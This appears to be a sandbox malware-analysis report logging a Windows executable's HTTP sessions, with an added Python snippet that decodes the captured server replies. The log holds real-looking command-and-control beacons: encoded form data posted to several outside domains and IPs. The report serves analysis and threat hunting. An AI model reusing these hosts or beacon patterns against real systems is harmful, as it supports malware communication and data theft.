                                                                      Data Raw: 70 72 68 34 3d 64 30 73 37 7a 51 51 51 72 62 36 53 65 6d 68 39 53 34 77 6d 70 4e 64 42 4c 6b 69 4e 47 4d 6c 69 41 77 4b 6f 67 63 6b 77 33 67 30 78 55 31 59 73 49 69 68 65 2f 34 32 6b 79 57 45 4b 6d 4f 36 46 4e 48 71 62 33 36 36 44 58 66 61 75 6d 36 4f 2f 64 4e 69 48 57 65 30 57 41 58 48 4e 78 6a 6e 4b 55 4b 32 34 58 6e 50 31 4c 65 4b 53 32 57 67 6f 33 6b 33 6b 66 72 54 75 54 73 4a 57 5a 34 6e 2b 50 73 34 2f 69 48 4c 6c 2f 65 4c 53 6e 45 46 73 69 62 6d 52 67 74 75 44 66 53 51 69 62 57 42 4d 4a 56 32 63 43 64 6a 6b 4e 72 48 52 61 73 62 77 6e 34 43 56 33 55 55 6d 74 56 64 48 49 45 47 68 76 6c 63 71 33 5a 7a 70 46 37 4e 71 78 73 72 6c 73 4b 56 32 61 56 4f 61 4d 71 68 4f 54 2b 54 35 56 62 43 46 36 52 68 6f 76 34 39 62 61 4c 49 47 54 45 45 51 6b 39 61 73 53 4c 31 56 73 49 2f 65 43 72 34 77 38 63 58 37 44 6d 35 55 6c 45 47 77 51 38 75 33 36 63 2b 6d 70 76 77 54 58 30 4f 67 4a 70 71 76 64 53 50 49 52 4c 38 64 36 63 56 42 6e 7a 44 48 6a 47 6f 55 6f 35 32 37 58 2b 72 32 45 6e 63 47 2b 6b 64 42 70 53 4e 36 36 [TRUNCATED]
                                                                      Data Ascii: prh4=d0s7zQQQrb6Semh9S4wmpNdBLkiNGMliAwKogckw3g0xU1YsIihe/42kyWEKmO6FNHqb366DXfaum6O/dNiHWe0WAXHNxjnKUK24XnP1LeKS2Wgo3k3kfrTuTsJWZ4n+Ps4/iHLl/eLSnEFsibmRgtuDfSQibWBMJV2cCdjkNrHRasbwn4CV3UUmtVdHIEGhvlcq3ZzpF7NqxsrlsKV2aVOaMqhOT+T5VbCF6Rhov49baLIGTEEQk9asSL1VsI/eCr4w8cX7Dm5UlEGwQ8u36c+mpvwTX0OgJpqvdSPIRL8d6cVBnzDHjGoUo527X+r2EncG+kdBpSN66 [TRUNCATED]
                                                                      Nov 20, 2024 09:24:26.987242937 CET | 832 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJxT0vs2sBoFq%2F3eft%2B6AfUPnysfAHJBCvGAXR80Koy0%2FbrZY2434rmA6GFJH8WqJtN6e0WLb3X77yochaZp35cAK3bRae%2BiD9qgDPT0O0bVo1%2BAyiS%2F6MHwQbmTmFv6m5vgjmGzxp8KcMw%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570b2f39057c82-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1787&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1808&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 140


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      24 | 192.168.2.10 | 50000 | 188.114.97.3 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:28.911557913 CET | 501 | OUT | GET /2nga/?prh4=Q2EbwnYhq4vEVEYycJMqtdR4BlKtLPQlBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63UJrhBCWi6xUDdTpqdehfcV6DO82Y8sA==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:24:29.561872005 CET | 777 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYIazJ6H8qLVrGgl05NVc8nJBB6mtPopQ03p%2FT4WiLATGV9QSZHnsehaMr7VOY2Z2HjM8TrPtHwV%2FXP3s4RW1I%2FyIkJuJlAVLl3LNlGUf5uByvMkC8y4tVRUWI235p7r3x%2FzK3b8AzjoKyo%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570b3f3ba8729f-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=501&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      25 | 192.168.2.10 | 50001 | 118.107.250.103 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:35.067323923 CET | 738 | OUT | POST /gxyh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Origin: http://www.zxyck.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/gxyh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 64 2f 45 77 78 34 44 52 6f 79 68 6a 4c 45 76 36 34 43 64 6b 6d 7a 4e 65 4d 53 71 38 33 54 70 6a 78 31 59 6c 69 4e 71 47 63 58 68 55 76 2f 34 4f 64 4e 4d 4a 65 64 68 64 53 79 6b 2b 4b 31 52 55 6f 37 59 6e 4c 62 4c 7a 79 67 4d 42 59 71 45 35 44 73 42 6e 67 37 6f 6f 78 35 38 71 78 6c 43 73 62 55 79 69 37 41 32 68 56 74 74 69 6c 48 4d 4d 4b 34 4a 43 75 5a 2f 5a 6a 58 38 6e 6a 57 38 77 38 31 37 69 49 64 77 32 64 6d 47 54 30 6b 72 34 74 5a 35 4e 36 6d 6f 32 77 34 67 6e 62 4a 6a 6a 70 38 6c 68 59 76 4b 35 4f 55 41 49 4d 59 39 4e
                                                                      Data Ascii: prh4=8gHotV00muxVd/Ewx4DRoyhjLEv64CdkmzNeMSq83Tpjx1YliNqGcXhUv/4OdNMJedhdSyk+K1RUo7YnLbLzygMBYqE5DsBng7oox58qxlCsbUyi7A2hVttilHMMK4JCuZ/ZjX8njW8w817iIdw2dmGT0kr4tZ5N6mo2w4gnbJjjp8lhYvK5OUAIMY9N
                                                                      Nov 20, 2024 09:24:35.861618996 CET | 308 | IN | HTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 20 Nov 2024 08:23:39 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///l=,0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      26 | 192.168.2.10 | 50002 | 118.107.250.103 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:37.623658895 CET | 762 | OUT | POST /gxyh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Origin: http://www.zxyck.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/gxyh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 66 66 30 77 32 5a 44 52 75 53 68 69 56 30 76 36 71 43 64 67 6d 7a 42 65 4d 54 2f 68 33 68 39 6a 77 51 6b 6c 77 38 71 47 66 58 68 55 6b 66 35 4b 54 74 4d 53 65 64 6b 69 53 78 38 2b 4b 31 46 55 6f 35 51 6e 4c 4b 4c 79 67 41 4d 48 51 4b 45 2f 48 73 42 6e 67 37 6f 6f 78 35 6f 41 78 6c 61 73 61 6b 43 69 30 43 65 2b 57 74 74 68 78 58 4d 4d 4f 34 49 71 75 5a 2f 33 6a 54 39 76 6a 51 34 77 38 77 66 69 49 73 77 78 45 32 47 5a 37 45 72 71 68 35 30 55 39 44 34 74 39 4f 4d 50 4c 61 7a 52 6a 39 59 6d 4a 2b 72 75 64 6a 63 47 43 65 49 6e 4c 47 32 6c 52 64 69 6a 38 78 48 57 65 37 30 6d 38 71 6b 45 7a 41 3d 3d
                                                                      Data Ascii: prh4=8gHotV00muxVff0w2ZDRuShiV0v6qCdgmzBeMT/h3h9jwQklw8qGfXhUkf5KTtMSedkiSx8+K1FUo5QnLKLygAMHQKE/HsBng7oox5oAxlasakCi0Ce+WtthxXMMO4IquZ/3jT9vjQ4w8wfiIswxE2GZ7Erqh50U9D4t9OMPLazRj9YmJ+rudjcGCeInLG2lRdij8xHWe70m8qkEzA==
                                                                      Nov 20, 2024 09:24:38.485940933 CET | 308 | IN | HTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 20 Nov 2024 08:23:41 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///l=,0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      27 | 192.168.2.10 | 50003 | 118.107.250.103 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:40.167831898 CET | 1775 | OUT | POST /gxyh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Origin: http://www.zxyck.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/gxyh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 66 66 30 77 32 5a 44 52 75 53 68 69 56 30 76 36 71 43 64 67 6d 7a 42 65 4d 54 2f 68 33 68 6c 6a 77 6d 77 6c 68 72 47 47 65 58 68 55 6e 66 35 4a 54 74 4e 49 65 5a 49 6d 53 32 31 44 4b 33 39 55 70 62 6f 6e 65 4f 58 79 35 77 4d 48 63 71 45 36 44 73 42 79 67 37 34 6b 78 35 34 41 78 6c 61 73 61 6d 61 69 77 51 32 2b 61 4e 74 69 6c 48 4d 32 4b 34 4a 48 75 5a 47 4b 6a 54 77 4e 69 67 59 77 38 51 50 69 4b 2b 59 78 62 6d 47 66 38 45 71 35 68 35 34 78 39 44 4d 50 39 4b 45 70 4c 61 37 52 75 70 64 73 4e 2f 37 6c 41 6b 73 41 4f 2f 46 45 41 32 54 5a 59 65 66 6e 38 6a 6d 4e 46 4a 31 4a 30 72 45 4a 67 79 51 46 67 33 75 58 70 31 53 69 73 52 74 32 62 41 59 61 44 36 64 39 4b 4a 42 6b 39 51 46 48 30 59 7a 34 67 54 4c 63 33 35 53 53 74 4c 46 32 34 6b 58 4f 63 4a 4a 41 32 58 44 64 46 63 59 34 34 65 38 6e 69 4e 47 2b 56 72 31 61 47 76 77 79 35 5a 61 34 46 4b 73 47 68 44 77 4a 53 52 49 76 34 55 33 4f 62 36 4d 7a 74 6f 5a 78 65 4c 53 6c 39 72 6c 4e 36 31 52 44 66 78 2b 51 35 [TRUNCATED]
                                                                      Data Ascii: prh4=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 [TRUNCATED]
                                                                      Nov 20, 2024 09:24:41.033252001 CET | 308 | IN | HTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 20 Nov 2024 08:23:44 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///l=,0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      28 | 192.168.2.10 | 50004 | 118.107.250.103 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:42.712119102 CET | 490 | OUT | GET /gxyh/?prh4=xivIugper8hSVuoN4YvDvis0ACu7xzkGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/YEeKRSLhAnFUBxmqELIOT++SwIfOluLOgfprtVp+sbk1f1bmq9tA==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:24:43.602325916 CET | 266 | IN | HTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 20 Nov 2024 08:23:46 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Data Raw: 31 63 0d 0a 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 7a 78 79 63 6b 2e 6e 65 74 2f 67 78 79 68 2e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 1c/www/wwwroot/zxyck.net/gxyh.0
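The report's "Data Ascii" line shows only the printable bytes of the raw chunked stream, so the gzip-compressed 200 OK bodies in sessions 27 and 28 read as `2e///l=,0` and cannot be compared with the plain reply to the GET. The following is an added example, not part of the Joe Sandbox report: it takes the two "Data Raw" byte strings from the responses above, removes the HTTP/1.1 chunk framing, inflates the gzip member and checks the gzip trailer, so both replies can be read side by side. The hex strings are copied from the report; everything else is this example's own code.

```python
"""Dechunk and inflate the response bodies captured in sessions 27/28 above.

Added example, not part of the Joe Sandbox report. GZIP_REPLY_HEX is the
'Data Raw' line of the 200 OK responses to the two POSTs (Content-Encoding:
gzip, Transfer-Encoding: chunked); PLAIN_REPLY_HEX is the 'Data Raw' line of
the uncompressed 200 OK response to the GET in session 28.
"""
import gzip
import struct

GZIP_REPLY_HEX = (
    "32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc "
    "12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 "
    "00 00 0d 0a 30 0d 0a 0d 0a"
)
PLAIN_REPLY_HEX = (
    "31 63 0d 0a 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 7a 78 79 63 6b 2e 6e "
    "65 74 2f 67 78 79 68 2e 0d 0a 30 0d 0a 0d 0a"
)


def dechunk(data: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: '<hex size>\\r\\n<chunk>\\r\\n' ... '0\\r\\n\\r\\n'."""
    out = bytearray()
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        # The size field may carry ';ext=val' chunk extensions; ignore them.
        size = int(data[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            break  # last-chunk; any trailer fields follow and are not body data
        chunk = data[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk")
        out += chunk
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk data")
        pos += 2
    return bytes(out)


def gzip_trailer(member: bytes):
    """CRC32 and ISIZE (uncompressed length mod 2**32) from the last 8 bytes of a gzip member."""
    return struct.unpack("<II", member[-8:])


def decode_reply(raw_hex: str, content_encoding: str = "") -> bytes:
    """Turn a captured 'Data Raw' hex dump into the body the client actually consumed."""
    body = dechunk(bytes.fromhex(raw_hex))
    if content_encoding.lower() != "gzip":
        return body
    if body[:2] != b"\x1f\x8b":
        raise ValueError("Content-Encoding says gzip but the gzip magic is missing")
    plain = gzip.decompress(body)  # also verifies CRC32 and ISIZE
    _, isize = gzip_trailer(body)
    if len(plain) != isize:
        raise ValueError("gzip ISIZE does not match inflated length")
    return plain


if __name__ == "__main__":
    print(decode_reply(GZIP_REPLY_HEX, "gzip"))
    print(decode_reply(PLAIN_REPLY_HEX))
```

Both replies inflate to the same 28-byte string, a server-side filesystem path rather than HTML despite the `text/html` Content-Type, which is a useful pivot when hunting for other hosts running the same panel. The chunk size `2e` (46 bytes) equals the gzip member length and the trailer's ISIZE field is 0x1c (28), so the inflated length can be sanity-checked before decompressing anything.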


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      29 | 192.168.2.10 | 50005 | 209.74.77.109 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:48.837893963 CET | 753 | OUT | POST /n9b0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Origin: http://www.dailyfuns.info
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.dailyfuns.info/n9b0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 47 33 42 44 6c 77 34 6a 6e 4d 64 35 76 78 2b 4a 50 69 6c 69 71 64 69 39 79 59 4a 61 56 68 50 71 76 6e 62 41 79 4f 78 7a 72 58 32 56 69 37 59 5a 69 59 47 39 33 6d 6b 4b 44 4b 69 6c 50 4c 41 68 4f 69 2b 36 34 34 41 36 63 42 30 57 45 57 70 6f 68 6d 34 6d 4e 77 65 64 64 47 74 6c 46 38 5a 62 55 65 50 4b 38 75 33 74 31 54 71 76 36 65 48 6d 45 76 65 6f 6f 77 76 48 46 4e 32 39 34 4e 54 75 61 35 76 37 6a 54 6f 46 4e 77 6d 72 34 73 67 6e 77 4c 75 36 65 66 48 74 2b 62 35 2f 54 70 79 43 76 56 4d 77 72 4a 6e 50 78 51 30 45 46 61 76
                                                                      Data Ascii: prh4=N+9LpEXYE/G8IG3BDlw4jnMd5vx+JPiliqdi9yYJaVhPqvnbAyOxzrX2Vi7YZiYG93mkKDKilPLAhOi+644A6cB0WEWpohm4mNweddGtlF8ZbUePK8u3t1Tqv6eHmEveoowvHFN294NTua5v7jToFNwmr4sgnwLu6efHt+b5/TpyCvVMwrJnPxQ0EFav
                                                                      Nov 20, 2024 09:24:49.431021929 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:49 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      30 | 192.168.2.10 | 50006 | 209.74.77.109 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:51.385857105 CET | 777 | OUT | POST /n9b0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Origin: http://www.dailyfuns.info
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.dailyfuns.info/n9b0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 6d 6e 42 41 43 6b 34 30 58 4d 65 33 50 78 2b 51 66 69 68 69 71 68 69 39 33 35 53 61 6e 46 50 71 50 58 62 53 48 75 78 79 72 58 32 64 43 37 64 55 43 59 5a 39 32 62 48 4b 44 47 69 6c 4f 72 41 68 4d 36 2b 36 4c 51 44 37 4d 42 32 65 6b 57 72 6d 42 6d 34 6d 4e 77 65 64 64 54 77 6c 46 6b 5a 48 31 75 50 59 75 57 34 78 46 54 72 6f 36 65 48 69 45 76 53 6f 6f 77 4a 48 42 45 5a 39 36 46 54 75 66 56 76 36 79 54 72 4d 4e 77 6b 6b 59 74 4a 33 67 32 35 67 4e 37 6a 73 2b 71 34 75 6a 4a 55 4d 75 6f 4c 68 36 6f 77 63 47 4d 36 4b 44 76 46 53 53 76 38 79 7a 46 79 5a 44 2f 31 5a 6b 4c 42 46 4d 79 54 73 41 3d 3d
                                                                      Data Ascii: prh4=N+9LpEXYE/G8ImnBACk40XMe3Px+Qfihiqhi935SanFPqPXbSHuxyrX2dC7dUCYZ92bHKDGilOrAhM6+6LQD7MB2ekWrmBm4mNweddTwlFkZH1uPYuW4xFTro6eHiEvSoowJHBEZ96FTufVv6yTrMNwkkYtJ3g25gN7js+q4ujJUMuoLh6owcGM6KDvFSSv8yzFyZD/1ZkLBFMyTsA==
                                                                      Nov 20, 2024 09:24:51.957765102 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:51 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
